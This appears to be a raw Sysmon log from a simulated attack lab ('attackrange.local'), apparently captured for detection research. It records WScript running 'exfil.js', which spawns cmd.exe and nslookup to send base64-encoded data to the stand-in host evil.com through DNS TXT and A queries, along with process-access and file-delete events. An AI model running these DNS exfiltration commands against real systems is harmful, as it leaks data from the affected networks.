14:21:40.884{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.883{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.883{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E644-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.882{2E1864BB-18E0-629A-6742-000000005F02}39767192C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-E644-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.882{2E1864BB-18F4-629A-E644-000000005F02}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzfw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000212068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.040{00000000-0000-0000-0000-000000000000}1492evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.887{00000000-0000-0000-0000-000000000000}7036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.795{00000000-0000-0000-0000-000000000000}3712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.705{00000000-0000-0000-0000-000000000000}6324evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.595{00000000-0000-0000-0000-000000000000}5692evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.493{00000000-0000-0000-0000-000000000000}3452evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.377{00000000-0000-0000-0000-000000000000}300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.287{00000000-0000-0000-0000-000000000000}5000evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.215{00000000-0000-0000-0000-000000000000}5908evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.112{00000000-0000-0000-0000-000000000000}7544evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.008{00000000-0000-0000-0000-000000000000}2308evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.892{00000000-0000-0000-0000-000000000000}6232evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000212056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.864{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnpljz.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.848{2E1864BB-18F4-629A-E444-000000005F02}29284636C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E544-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E544-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.834{2E1864BB-18F4-629A-E344-000000005F02}4812420C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-E544-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.839{2E1864BB-18F4-629A-E544-000000005F02}5036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-E344-000000005F02}4812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnpljz.tmp 2>&1 10341000x8000000000000000212047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.817{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E444-000000005F02}2928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.817{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E444-000000005F02}2928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.801{2E1864BB-18F4-629A-E444-000000005F02}29284636C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E344-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.801{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E444-000000005F02}2928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E344-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-18E0-629A-6742-000000005F02}39762600C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-E344-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{2E1864BB-18F4-629A-E344-000000005F02}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnpljz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.785{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltnrbp.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.779{2E1864BB-18F4-629A-E144-000000005F02}56084624C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E244-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 